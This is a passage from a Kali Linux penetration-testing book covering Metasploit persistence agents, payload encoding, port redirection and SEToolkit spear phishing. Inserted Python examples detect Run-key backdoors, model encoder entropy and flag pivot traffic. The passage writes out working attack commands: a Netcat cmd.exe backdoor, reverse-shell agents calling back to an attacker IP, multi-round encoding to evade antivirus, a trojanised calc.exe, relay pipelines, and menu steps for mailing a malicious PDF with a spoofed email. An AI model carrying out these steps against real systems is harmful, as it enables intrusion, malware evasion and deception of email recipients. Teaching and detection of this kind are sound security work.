Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YTpKAlna 
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YTpKAlna 



Note that we have arbitrarily selected port 444 for use by persistence; an 
attacker must verify the local firewall settings to ensure that this port is 
open, or use the reg command to open the port. Like most Metasploit 
modules, any port can be selected as long as it is not already in use. 
The persistence script places a VBS file in a temporary directory; however, you can 
use the -L option to specify a different location. The script also adds that file to the 
local autorun sections of the registry. 
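Both persistence mechanisms in this chapter end up as values in the Run key: the Netcat entry (nc.exe -Ldp 444 -e cmd.exe) registered earlier with reg setval, and the persistence script's VBS entry under a random value name. The following is an added example for this edition, not the book's or Metasploit's code, covering both: given value-name/command pairs as dumped from the Run key, it reports netcat-family binaries, a shell bound with -e, images or scripts under a Temp directory, and machine-generated-looking value names. The entries, the binary names and the heuristic thresholds are constructed assumptions.

```python
r"""Added example (not from the book): score entries from the Run key for the
persistence patterns this chapter describes: a Netcat-family binary, a shell bound
to the connection with -e, an image or script under a Temp directory, and a
machine-generated-looking value name. The entries, binary names and thresholds
are constructed assumptions; a real run would feed in the output of
'reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run'."""
import shlex

NETCAT_BINARIES = {"nc.exe", "nc64.exe", "ncat.exe", "cryptcat.exe"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell"}
SCRIPT_EXT = (".vbs", ".js", ".bat", ".cmd", ".ps1", ".hta")
TEMP_MARKERS = ("\\temp\\", "\\tmp\\", "%temp%", "%tmp%")


def tokens_of(command):
    """Split a Windows command line; shlex keeps quotes in non-POSIX mode, so strip them."""
    return [token.strip('"') for token in shlex.split(command, posix=False)]


def looks_random(name, min_letters=6, min_case_switches=3, max_vowel_ratio=0.35):
    """Weak heuristic for generated names such as YTpKAlna: enough letters, several
    upper/lower switches and few vowels. Tune the thresholds to your environment."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < min_letters:
        return False
    switches = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    vowels = sum(1 for c in letters if c.lower() in "aeiou")
    return switches >= min_case_switches and vowels / len(letters) < max_vowel_ratio


def entry_findings(name, command):
    """Reasons one Run-key entry (value name, command line) deserves review."""
    reasons = []
    tokens = tokens_of(command)
    if not tokens:
        return reasons
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    lowered = command.lower()
    if image in NETCAT_BINARIES:
        reasons.append(f"netcat-family binary {image}")
    for flag, arg in zip(tokens, tokens[1:]):
        if flag == "-e" and arg.lower() in SHELLS:
            reasons.append(f"binds {arg} to the network connection (-e)")
    if any(marker in lowered for marker in TEMP_MARKERS):
        reasons.append("runs from a temporary directory")
    if any(token.lower().endswith(SCRIPT_EXT) for token in tokens):
        reasons.append("launches a script file")
    if looks_random(name):
        reasons.append("weak: value name looks machine-generated")
    return reasons


def scan_run_entries(entries):
    """{value_name: [reasons]} for every entry with at least one finding."""
    flagged = {}
    for name, command in entries:
        reasons = entry_findings(name, command)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed Run-key contents: the two entries this chapter creates plus two
# ordinary ones.
SAMPLE_RUN = [
    ("nc", r"C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"),
    ("YTpKAlna", r"C:\WINDOWS\TEMP\eRCqtxBufilTB.vbs"),
    ("ctfmon.exe", r"C:\WINDOWS\system32\ctfmon.exe"),
    ("Adobe Reader Speed Launcher", r'"C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"'),
]

if __name__ == "__main__":
    for name, reasons in scan_run_entries(SAMPLE_RUN).items():
        print(name, "->", "; ".join(reasons))
```

The random-name check is marked weak on purpose: on its own it produces false positives, so treat it as corroboration for the path and command findings rather than as a finding in itself.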

Because the persistence script is not authenticated and anyone can use it to access 
the compromised system, it should be removed from the system as soon as possible 
after the discovery or completion of penetration testing. To remove the script, 
confirm the location of the resource file for cleanup, and then execute the following 
resource command: 

meterpreter> run multi_console_command -rc /root/.msf4/logs/persistence/RWBEGGS-1E69067_20130920.0024/RWBEGGS-1E69067_20130920.0024.rc 

Creating a standalone persistent agent with Metasploit 

The Metasploit Framework can be used to create a stand-alone executable that 
can persist on a compromised system and allow interactive communications. 

The advantage of a stand-alone package is that it can be prepared and tested in 
advance to ensure connectivity and encoded to bypass local antivirus software. 

To make a simple stand-alone agent, launch msfconsole on a command prompt 
in Kali. 

Use msfpayload to craft the persistence agent. In the example shown in the 
following screenshot, the agent is configured to use a reverse_tcp shell that 
will connect to the local host at 192.168.43.130 on port 4444. The agent, 
named attack1.exe, will use a Win32 executable template. 

msf > msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.43.130 LPORT=4444 X > /root/Desktop/attack1.exe 

[*] exec: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.43.130 LPORT=4444 X > /root/Desktop/attack1.exe 

Created by msfpayload (http://www.metasploit.com). 

Payload: windows/meterpreter/reverse_tcp 
Length: 290 
Options: {"LHOST"=>"192.168.43.130", "LPORT"=>"4444"} 



The stand-alone agent will only work on compromised systems with no antivirus 
installed, or if the antivirus has first been disabled using the appropriate 
meterpreter command. To bypass the antivirus, the backdoor must be encoded. 






There are several different options for encoding the payload, as shown in the 
following screenshot: 



Usage: /opt/metasploit/apps/pro/msf3/msfencode <options> 

OPTIONS: 

    -a <opt>  The architecture to encode as 
    -b <opt>  The list of characters to avoid: '\x00\xff' 
    -c <opt>  The number of times to encode the data 
    -d <opt>  Specify the directory in which to look for EXE templates 
    -e <opt>  The encoder to use 
    -h        Help banner 
    -i <opt>  Encode the contents of the supplied file path 
    -k        Keep template working; run payload in new thread (use with -x) 
    -l        List available encoders 
    -m <opt>  Specifies an additional module search path 
    -n        Dump encoder information 
    -o <opt>  The output file 
    -p <opt>  The platform to encode for 
    -s <opt>  The maximum size of the encoded data 
    -t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,csharp,js_be,js_le,java,python,py,powershell,ps1,vbscript,vbapplication,dll,exe,exe-service,exe-small,exe-only,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net 
    -v        Increase verbosity 
    -x <opt>  Specify an alternate executable template 



To see the available encoders, use the show encoders command. 

Metasploit uses approximately 30 different encoders; by default, it will select the 
most appropriate encoder if one is not specified. 

A good general encoder to use is shikata_ga_nai. This encoder implements 
polymorphic XOR additive feedback encoding against a 4-byte key, and it is the 
only encoder ranked as "excellent" by Metasploit. 

To encode the previously prepared attack.exe agent, we use the following 
command: 

msf > msfencode -i attack.exe -o encoded_attack.exe -e x86/shikata_ga_nai -c 5 -t exe 

This encodes the attack.exe agent five times using the shikata_ga_nai encoder. 
Each time it is re-encoded, it becomes more difficult to detect. However, the 
executable also increases in size. 
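To make the description of shikata_ga_nai concrete, here is an added Python model (not the book's code and not Metasploit's) of XOR encoding with a 4-byte key and additive feedback, together with the two checks a practitioner runs on such output: which of the bad characters that the -b option excludes appear in the result, and how far the byte entropy rises, which is the property that entropy-based detection of encoded payloads relies on. The key, the sample bytes and the function names are constructed for this example; the real encoder operates on x86 shellcode and prepends a decoder stub, which is why every extra round also grows the file.

```python
import math
import struct


def entropy_bits(data):
    """Shannon entropy in bits per byte: 0.0 for a constant string, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def xor_feedback_encode(data, key):
    """Constructed model of XOR additive-feedback encoding with a 4-byte key.

    Each 4-byte block is XORed with the current key, then the key is advanced by
    adding the plaintext block, so every later block is encoded under a key that
    depends on all the data before it. This illustrates the scheme the text
    describes; it is not Metasploit's x86 implementation, which also prepends a
    decoder stub (the reason each extra round makes the file bigger).
    """
    data = data + b"\x00" * (-len(data) % 4)  # pad to whole 4-byte blocks
    out = bytearray()
    for i in range(0, len(data), 4):
        plain = struct.unpack("<I", data[i:i + 4])[0]
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & 0xFFFFFFFF  # additive feedback
    return bytes(out)


def xor_feedback_decode(data, key):
    """Inverse of xor_feedback_encode; this is the work a decoder stub does at run time."""
    out = bytearray()
    for i in range(0, len(data), 4):
        plain = struct.unpack("<I", data[i:i + 4])[0] ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)


def bad_bytes_present(data, bad):
    """Return the sorted byte values from the bad-character list that occur in data."""
    return sorted(set(data) & set(bad))


# Constructed input and key; a run of one byte stands in for low-entropy payload filler.
SAMPLE = b"A" * 128
KEY = 0x1E69067A

if __name__ == "__main__":
    encoded = xor_feedback_encode(SAMPLE, KEY)
    print(f"plain entropy   {entropy_bits(SAMPLE):.2f} bits/byte")
    print(f"encoded entropy {entropy_bits(encoded):.2f} bits/byte")
    print("bad bytes in output:", bad_bytes_present(encoded, b"\x00\x0a\x0d"))
    assert xor_feedback_decode(encoded, KEY) == SAMPLE
```

Two points follow from the model. First, the key is stored beside the data (in the decoder stub), so encoding is not encryption: anyone who recovers the stub recovers the payload, which is why sandboxes that emulate the stub defeat it. Second, the feedback makes even a constant input produce varied output, which is what pushes the entropy up; a file section whose entropy is far above that of normal code is a common trigger for closer inspection.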
The full payload can be created directly from the command line in Kali. Not only can 
it be encoded, but we can configure the encoding pattern to avoid certain characters. 
For example, the following characters should be avoided when encoding a persistent 
agent because they may result in discovery and failure of the attack: 

• \x00 represents a null byte 

• \x0a represents a line feed 

• \x0d represents a carriage return 

To create a multiencoded payload, use the following command: 

msf > msfpayload windows/meterpreter/bind_tcp LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw -a x86 -b '\x00\x0a\x0d' -c 5 -x /root/Desktop/attack.exe -o /root/Desktop/encoded_attack.exe 

You can also encode the msfpayload output into an existing executable, and both the modified 
executable and the persistent agent will function. To bind the persistent agent to an 
executable such as a calculator (calc.exe), first copy the appropriate calc.exe file 
into Metasploit's template folder located at /usr/share/metasploit-framework/ 
data/templates. When the template is in place, use the following command: 

msf > msfpayload windows/meterpreter/bind_tcp LPORT=444 R | msfencode -t exe -x calc.exe -k -o encoded_calc_attack.exe -e x86/shikata_ga_nai -c 5 

The agent can be placed on the target system, renamed calc.exe to replace the 
original calculator, and then executed. 

Unfortunately, nearly all Metasploit-encoded executables can be detected by 
client antivirus software. This has been attributed to penetration testers who have 
submitted encoded payloads to sites such as VirusTotal (www.virustotal.com). 
However, you can create an executable and then encrypt it using Veil-Evasion, as 
described in Chapter 4, Exploit. 

Redirecting ports to bypass network controls 

Thus far, we've examined remote control access to the exploited system as if we have 
a direct connection between the victim's and the attacker's machines; however, such 
connectivity is frequently controlled or blocked by network devices such as a firewall. 
Attackers can circumvent these controls using port redirection: a designated 
system listens on defined ports and forwards the raw packets to a specific 
secondary location. 

Kali provides several tools that support port redirection, including nc, cryptcat, 
socat, ssh, fpipe, and Metasploit's meterpreter; we'll look at some examples in 
the following sections. 

Example 1 - simple port redirection 

Simple port redirection may be used, for example, if you have compromised a 
system on the exterior of the network in the Demilitarized Zone (DMZ) and need 
to be able to communicate with an internal system from a remote location. 

On the compromised system in the DMZ, configure an instance of Netcat to listen for 
incoming connections and forward them to the target using the following command: 

root@kali:~# nc -l -p 44444 -e <TARGET IP> 444 

This command will invoke Netcat (nc) to listen (-l) for incoming traffic, and execute 
(-e) the transfer of this incoming traffic to the target on port 444. Ports are not fixed 
and they do not have to be the same on both the listening/forwarding host and the 
final target. 

If you lack complete information regarding the target's internal network, you may 
try the following command: 

root@kali:~# nc -l -p <local listening port> -c "nc <TARGET IP> <TARGET port>" 

This command sets the local (attacker) instance of Netcat to listen (-l) on a 
designated port, and then instructs Netcat to create a new process with each 
new connection (-c). 

This simple example allows the outsider to connect to the direct network; however, 
it does not permit a bidirectional data connection, which is required for some tools. 






Example 2 - bidirectional port redirection 

Consider three separate Windows data systems: 

[Attacker] | [Forwarder] | [Target] 

In order to enable a bidirectional communications channel using Netcat, we will 
have to use named pipes. A named pipe, also referred to as FIFO, is a means of 
creating defined interprocess communication; this allows us to handle it as an object, 
making it easier to manage when issuing commands. In the following sample attack, 
we create a named pipe called reverse to handle bidirectional communications. 

The Attacker has an instance of Netcat on his local system set to listen on port 6661 
using the following command: 

nc -l 6661 

The Forwarder, a compromised box with an instance of Netcat installed, will listen 
for incoming packets and forward them to the target; it is configured to listen on port 
6666 using the following command: 

nc -l 6666 

On the target system, enter the following command to create the named pipe: 

mkfifo reverse 

Then, configure a local instance of Netcat to use that named pipe to establish 
two-way communications across the forwarding system to the Attacker using the 
following command: 

nc localhost 6661 0<reverse | nc localhost 6666 1>reverse 

The same bidirectional data flow can be achieved using socat, which is designed 
to implement connections of this type. The command for this example would be 
executed from the target system and use: 

socat tcp:localhost:6661 tcp:localhost:6646 
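Both redirection examples leave the same trace on the network: a DMZ host accepts an inbound connection on a port it does not normally serve and, within moments, opens a connection of its own into the internal network. The following Python is an added example, not code from the book, that correlates constructed firewall flow-log lines to surface that pattern. The log format, the DMZ and internal address ranges, the expected-services table and the time window are assumptions of the example; on a real network they come from the firewall's own export format and asset inventory.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed flow-log lines. Lines 1-2: an external host reaches a DMZ host on an
# unusual port and the DMZ host immediately connects inward (the relay pattern).
# Lines 3-4: ordinary web traffic followed by a database query. Lines 5-6: an
# unusual inbound port, but the inward connection comes 20 seconds later.
SAMPLE_FLOWS = """\
2013-09-18T14:49:01 src=203.0.113.5:51000 dst=192.168.100.10:44444 proto=tcp
2013-09-18T14:49:01 src=192.168.100.10:40001 dst=10.0.0.7:444 proto=tcp
2013-09-18T14:50:00 src=198.51.100.9:52000 dst=192.168.100.10:443 proto=tcp
2013-09-18T14:50:00 src=192.168.100.10:40002 dst=10.0.0.20:3306 proto=tcp
2013-09-18T14:52:10 src=203.0.113.5:51001 dst=192.168.100.10:6666 proto=tcp
2013-09-18T14:52:30 src=192.168.100.10:40003 dst=10.0.0.7:6661 proto=tcp
"""

DMZ_NETS = [ip_network("192.168.100.0/24")]        # assumed DMZ address range
INTERNAL_NETS = [ip_network("10.0.0.0/8")]         # assumed internal address range
EXPECTED_SERVICES = {"192.168.100.10": {80, 443}}  # ports the DMZ host is meant to serve

FLOW_RE = re.compile(r"^(\S+) src=(\S+):(\d+) dst=(\S+):(\d+) proto=tcp$")


def in_nets(ip, nets):
    return any(ip_address(ip) in net for net in nets)


def parse_flows(text):
    """Return (timestamp, src, sport, dst, dport) tuples in time order."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line.strip())
        if not m:
            continue  # skip lines in a format we do not understand rather than crash
        ts, src, sport, dst, dport = m.groups()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    flows.sort(key=lambda f: f[0])  # stable: ties keep their logged order
    return flows


def find_pivots(text, window_seconds=5):
    """Flag DMZ hosts that accept an external connection on an unexpected port and,
    within the window, open a connection into the internal network."""
    flows = parse_flows(text)
    pivots = []
    for i, (t_in, src, _, host, lport) in enumerate(flows):
        if not in_nets(host, DMZ_NETS) or in_nets(src, DMZ_NETS) or in_nets(src, INTERNAL_NETS):
            continue  # only external-origin connections into the DMZ
        if lport in EXPECTED_SERVICES.get(host, set()):
            continue  # the host is supposed to serve this port
        for t_out, src2, _, dst2, dport2 in flows[i + 1:]:
            if t_out - t_in > timedelta(seconds=window_seconds):
                break  # later flows are outside the window
            if src2 == host and in_nets(dst2, INTERNAL_NETS):
                pivots.append((host, src, lport, dst2, dport2))
                break
    return pivots


if __name__ == "__main__":
    for host, ext, lport, dst, dport in find_pivots(SAMPLE_FLOWS):
        print(f"{host}:{lport} accepted {ext} and then connected to {dst}:{dport}")
```

On the sample, only the first pair is reported; the web-to-database pair is excluded because 443 is an expected service, and the last pair falls outside the five-second window. The expected-services table is what keeps the rule from firing on every web server that talks to a database, so it has to be maintained per host.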
Summary 

In this chapter, we focused on the final stage of the attacker's kill chain — the 
command, control, and communications stage — where the attacker uses a persistent 
agent to communicate with a compromised system. 

That concludes the first part of this book where we examined the attacker's kill chain 
in detail to see how it could be applied towards compromising a network or an 
isolated system. 

In Part 2, The Delivery Phase, we will examine specific applications of the kill chain 
using various exploit paths. In Chapter 7, Physical Attacks and Social Engineering, we 
will focus on physical security and social engineering attacks. Topics will include 
an overview of the attack methodology, crafting hostile USB devices and rogue 
microcomputers, the Social Engineering Toolkit, and testing the resilience of a 
system to phishing attacks. 
The Delivery Phase 

Physical Attacks and Social Engineering 

Exploiting Wireless Communications 

Reconnaissance and Exploitation of Web-based Applications 

Exploiting Remote Access Communications 

Client-side Exploitation 

Installing Kali Linux 



7 

Physical Attacks and Social Engineering 



Social engineering, especially when combined with physical access to the target 
system, is the single most successful attack vector used for penetration testing or 
an actual attack. 

As an attack route supporting the kill chain, social engineering focuses on the 
nontechnical aspects of an attack that take advantage of a person's trust and innate 
helpfulness to deceive and manipulate them into compromising a network and 
its resources. 

The success of social engineering attacks relies on two key factors: 

• The knowledge that is gained during the reconnaissance phase. The attacker 
must know the names and usernames associated with the target; more 
importantly, the attacker must understand the concerns of the users on the 
network. 

• Understanding how to apply this knowledge to convince potential targets 
to activate the attack by clicking on a link, or executing a program. For 
example, if the target company has just merged with a former competitor, the 
job security of employees will likely be the top-of-mind concern. Therefore, 
e-mails or documents with titles associated with that subject will likely be 
opened by targeted individuals. 

Kali Linux provides several tools and frameworks that have an increased chance of 
success if social engineering is used as a pretext to influence victims to open files or 
execute certain operations. Examples include script attacks (including Visual Basic, 
WMI, and PowerShell scripts), executables created by the Metasploit Framework, 
and BeEF (the Browser Exploitation Framework). 





In this chapter, we'll focus on the Social Engineering Toolkit, or SEToolkit. The 
techniques used in employing this tool will serve as the model for using 
social engineering to deploy attacks from other tools. 

By the end of this chapter, you will learn how to use the SEToolkit to do 
the following: 

• Obtain a remote shell using spear phishing and Java applet attacks 

• Harvest or collect usernames and passwords using the credential 
harvester attack 

• Launch the tabnabbing and webjacking attacks 

• Employ the multi-attack web method 

• Use PowerShell's alphanumeric shellcode injection attack 

To support SET's social engineering attacks, the following general implementation 
practices will be described: 

• Hiding malicious executables and obfuscating the attacker's URL 

• Escalating an attack using DNS redirection 

You will also learn how to create and implement hostile physical devices based on 
the Raspberry Pi microcomputer. 

Social Engineering Toolkit 

The Social-Engineer Toolkit (SEToolkit) was created and written by David 
Kennedy (ReL1K), and it is maintained by an active group of collaborators 
(www.social-engineer.org). It is an open source Python-driven framework 
that is specifically designed to facilitate social engineering attacks. 

A significant advantage of SEToolkit is its interconnectivity with the Metasploit 
Framework which provides the payloads needed for exploitation, the encryption 
to bypass anti-virus, and the listener module that connects to the compromised 
system when it sends a shell back to the attacker. 

Before launching SEToolkit, you may wish to make some modifications to the 
configuration file. 
The Social Engineering Toolkit is preconfigured with common default settings; 
however, these settings can be altered to adapt the kit to specific attack scenarios. In 
Kali, the configuration file is /usr/share/set/config/set_config. Modifying this 
file allows you to control the following: 

• Metasploit variables, including the location, the database to use, how many 
times a payload should be encoded, and commands to automatically run 
once a meterpreter session has been established. 

• Ettercap and dsniff switches to facilitate DNS redirection attacks and 
capture of authentication credentials. By controlling the DNS, an attacker 
can automatically direct groups of people to false sites created using the 
setoolkit. 

• Configuration of sendmail or other mail programs for use in attacks 
requiring spoofed e-mail addresses; this allows the social engineer to enhance 
the credibility of attacks by using an e-mail address that appears to come 
from a trusted source, such as a senior manager in the same company. 

• The e-mail provider to be used, including Gmail, Hotmail, and Yahoo. 

• Creating self-signed Java applets with a spoofed publisher, activating SSL 
certificates, and stealing digital signatures. 

• Other variables such as the IP address, port assignments, and encoding 
parameters. 

To open the Social Engineering Toolkit (SET) in the Kali distribution, go to Applications | 
Kali Linux | Exploitation Tools | Social Engineering Toolkit | setoolkit, or enter 
setoolkit at a shell prompt. You will be presented with the main menu, as shown 
in the following screenshot: 

Select from the menu: 

   1) Social-Engineering Attacks 
   2) Fast-Track Penetration Testing 
   3) Third Party Modules 
   4) Update the Metasploit Framework 
   5) Update the Social-Engineer Toolkit 
   6) Update SET configuration 
   7) Help, Credits, and About 

  99) Exit the Social-Engineer Toolkit 
If you select 1) Social-Engineering Attacks, you will be presented with the 
following submenu: 

Select from the menu: 

   1) Spear-Phishing Attack Vectors 
   2) Website Attack Vectors 
   3) Infectious Media Generator 
   4) Create a Payload and Listener 
   5) Mass Mailer Attack 
   6) Arduino-Based Attack Vector 
   7) SMS Spoofing Attack Vector 
   8) Wireless Access Point Attack Vector 
   9) QRCode Generator Attack Vector 
  10) Powershell Attack Vectors 
  11) Third Party Modules 

  99) Return back to the main menu. 



The following is a brief explanation of the social engineering attacks: 

• Spear-Phishing Attack Vector allows an attacker to create e-mail 
messages and send them to targeted victims with attached exploits. 

• Website Attack Vectors utilize multiple web-based attacks, including 
the following: 

° Java Applet Attack Method spoofs a Java certificate and delivers a 
Metasploit-based payload. This is one of the most successful attacks, 
and it is effective against Windows, Linux, or OSX targets. 

° Metasploit Browser Exploit Method delivers a Metasploit 
payload using an iFrame attack. 

° Credential Harvester Attack Method clones a website and 
automatically rewrites the POST parameters to allow an attacker to 
intercept and harvest user credentials; it then redirects the victim 
back to the original site when harvesting is completed. 

° Tabnabbing Attack Method replaces information on an inactive 
browser tab with a cloned page that links back to the attacker. When 
the victim logs in, the credentials are sent to the attacker. 

° Web Jacking Attack Method utilizes iFrame replacements to make 
the highlighted URL link appear legitimate; however, when it is 
clicked, a window pops up, and is then replaced with a malicious link. 
° Multi-Attack Web Method allows an attacker to select some or all 
of several attacks that can be launched at once, including the Java 
Applet Attack Method, the Metasploit Browser Exploit 
Method, the Credential Harvester Attack Method, the Tabnabbing 
Attack Method, and the Man Left in the Middle Attack Method. 

• Infectious Media Generator creates an autorun.inf file and Metasploit 
payload. Once burned or copied to a USB device or physical media (CD or 
DVD) and inserted into the target system, it will trigger an autorun (if 
autorun is enabled) and compromise the system. 

• The Create a Payload and Listener module is a rapid menu-driven 
method of creating a Metasploit payload. The attacker must use a separate 
social engineering attack to convince the target to launch it. 

• MassMailer Attack allows the attacker to send multiple customized e-mails 
to a single e-mail address or a list of recipients. 

• Arduino-Based Attack Vector programs Arduino-based devices, such 
as the Teensy. Because these devices register as a USB keyboard when 
connected to a physical Windows system, they can bypass security based 
on disabling the autorun or other endpoint protection. 

• SMS Spoofing Attack Vector allows the attacker to send a crafted Short 
Message Service text to a person's mobile device, and spoof the source of 
the message. 

• Wireless Access Point Attack Vector will create a fake wireless access 
point and DHCP server on the attacker's system and redirect all DNS queries 
to the attacker. The attacker can then launch various attacks, such as the Java 
Applet Attack or a credential harvester attack. 

• QRcode Generator Attack Vector creates a QRCode with a defined URL 
associated with an attack. 

• Powershell Attack Vectors allow the attacker to create attacks that rely 
on PowerShell, a command-line shell and scripting language available on 
all Windows Vista and higher versions. 

• Third Party Modules allow the attacker to use the Remote Administration 
Tool Tommy Edition (RATTE), as part of a Java Applet Attack or as an 
isolated payload. RATTE is a text menu-driven remote access tool. 

SEToolkit also gives a menu item for Fast-Track Penetration Testing, which 
gives rapid access to some specialized tools that support brute force identification 
and password cracking of SQL databases, as well as some customized exploits 
that are based on Python, SCCM attack vectors, Dell computer DRAC/chassis 
exploitation, user enumeration, and PSEXEC PowerShell injection. 
The menu also gives options for updating the Metasploit Framework, SEToolkit, and 
the SEToolkit configuration. However, these additional options should be avoided as 
they are not fully supported by Kali, and may cause conflicts with dependencies. 

As an initial example of the SEToolkit's strengths, we'll see how it can be used to 
gain a remote shell — a connection made from the compromised system back to the 
attacker's system. 

Spear Phishing Attack 

Phishing is an e-mail fraud attack carried out against a large number of victims, 
such as a list of known American Internet users. The targets are generally not 
connected, and the e-mail does not attempt to appeal to any specific individual. 
Instead, it contains an item of general interest (for example, "Click here for bargain 
medications") and a malicious link or attachment. The attacker plays the odds that at 
least some people will click on the link attachment to initiate the attack. 

On the other hand, spear phishing is a highly specific form of phishing attack — by 
crafting the e-mail message in a particular way, the attacker hopes to attract the 
attention of a specific audience. For example, if the attacker knows that the sales 
department uses a particular application to manage its customer relationships, he 
may spoof an e-mail pretending that it is from the application's vendor with a subject 
line of "Emergency fix for <application> - Click link to download". 

The success rate of a phishing attack is typically less than five percent; 
however, the success rate of a spear phishing attack ranges from forty 
to eighty percent. This is why information from the reconnaissance 
phase is critical to the success of this type of attack. 

On average, only ten to fifteen e-mails need to be sent to a target 
before at least one is clicked on. 

Before launching the attack, ensure that sendmail is installed on Kali (apt-get 
install sendmail) and change the set_config file from SENDMAIL=OFF to 
SENDMAIL=ON. 

To launch the attack, select Social Engineering Attacks from the main SEToolkit 
menu, and then select Spear- Phishing Attack Vectors from the submenu. This 
will launch the start options for the attack, as shown in the following screenshot: 
The Spearphishing module allows you to specially craft email messages and send 
them to a large (or small) number of people with attached fileformat malicious 
payloads. If you want to spoof your email address, be sure "Sendmail" is 
installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF 
flag to SENDMAIL=ON. 

There are two options, one is getting your feet wet and letting SET do 
everything for you (option 1), the second is to create your own FileFormat 
payload and use it in your own attack. Either way, good luck and enjoy! 

   1) Perform a Mass Email Attack 
   2) Create a FileFormat Payload 
   3) Create a Social-Engineering Template 



Select 1 to perform a mass e-mail attack; you will then be presented with a list of 
attack payloads, as shown in the following screenshot: 



********** PAYLOADS ********** 

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 

2) SET Custom Written Document UNC LM SMB Capture Attack 

3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 

4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 

5) Adobe Flash Player "Button" Remote Code Execution 

6) Adobe CoolType SING Table "uniqueName" Overflow 

7) Adobe Flash Player "newfunction" Invalid Pointer Use 

8) Adobe Collab.collectEmailInfo Buffer Overflow 

9) Adobe Collab.getIcon Buffer Overflow 

10) Adobe JBIG2Decode Memory Corruption Exploit 

11) Adobe PDF Embedded EXE Social Engineering 

12) Adobe util.printf() Buffer Overflow 

13) Custom EXE to VBA (sent via RAR) (RAR required) 

14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 

15) Adobe PDF Embedded EXE Social Engineering (NOJS) 

16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 

17) Apple QuickTime PICT PnSize Buffer Overflow 

18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 

19) Adobe Reader u3D Memory Corruption Vulnerability 

20) MSCOMCTL ActiveX Buffer Overflow (MS12-027) 



One of the most effective attacks is 15) Adobe PDF Embedded EXE Social 
Engineering; however, the attack selected will vary with the attacker's knowledge 
of available targets gained during the reconnaissance phase. 






When prompted to use your own PDF or a built-in blank PDF for the attack as 
shown in the following screenshot, select 2 for the built-in blank payload. You will 
then be prompted to select the payload. 



[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE. 

   1. Use your own PDF for attack 
   2. Use built-in BLANK PDF for attack 

set:payloads>2 

   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker 
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker 
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker 
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline 
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter 
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system 
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter 



Through testing on multiple networks, we have found that options 1 and 2 
(Windows Reverse TCP Shell, and Windows Meterpreter Reverse_TCP) are 
the most reliable payloads. For this example, we will select Windows Meterpreter 
Reverse_TCP — when the PDF is opened, it will execute a reverse shell back to the 
attacking system. 

In instances where stealth is more important than reliability, Windows Meterpreter 
Reverse HTTPS is the best option. 

SEToolkit will prompt for the payload listener (the attacker's IP address) and 
listening port, with the default port of 443. 

The next menu prompts for changing the filename of the PDF file; the default name 
is moo.pdf, as shown in the following screenshot: 

set> IP address for the payload listener: 192.168.43.130 
set:payloads> Port to connect back on [443]: 

[-] Defaulting to port 443... 

[-] Generating fileformat exploit... 

[*] Payload creation complete. 

[*] All payloads get sent to the /root/.set/template.pdf directory 

[-] As an added bonus, use the file-format creator in SET to create your attachment. 

   Right now the attachment will be imported with filename of 'template.whatever' 

   Do you want to rename the file? 

   example Enter the new filename: moo.pdf 

    1. Keep the filename, I don't care. 
    2. Rename the file, I want to be cool. 
The default name will not likely entice a potential victim to open the file; 
furthermore, it may be identified by client-side security. For these reasons, 
the filename should be changed. The name should reflect the intended audience 
being attacked. For example, if you are targeting the finance group, give the PDF 
file a title such as Tax Law Amendments. 

You will now be offered the option of either attacking a single e-mail address, or 
mass-mailing (for example, an employee list of the target company, or a specific 
group within the company). Option 1 was selected for this example. 

SEToolkit will then prompt to use a predefined template or craft a one-time e-mail 
template. If you select a predefined template, the following options will be available: 



   Do you want to use a predefined template or craft 
   a one time email template. 

   1. Pre-Defined Template 
   2. One-Time Use Email Template 

set:phishing>1 

[-] Available templates: 
1: WOAAAA!!!!!!!!!! This is crazy... 
2: Dan Brown's Angels & Demons 
3: Strange internet usage from your computer 
4: How long has it been? 
5: Baby Pics 
6: Have you seen this? 
7: New Update 
8: Computer Issue 
9: Order Confirmation 
10: Status Report 
set:phishing>10 

set:phishing> Send email to: john@target.com 



An effective social engineering attack is crafted for the target; therefore, select option 
2, One-Time Use Email Template, to create a one-time use e-mail template, as 
shown in the following screenshot: 



set:phishing>2 

set:phishing> Subject of the email: New email server 

set:phishing> Send the message as html or plain? 'h' or 'p': p 

Enter the body of the message, hit return for a new line. Control+c when finished: 

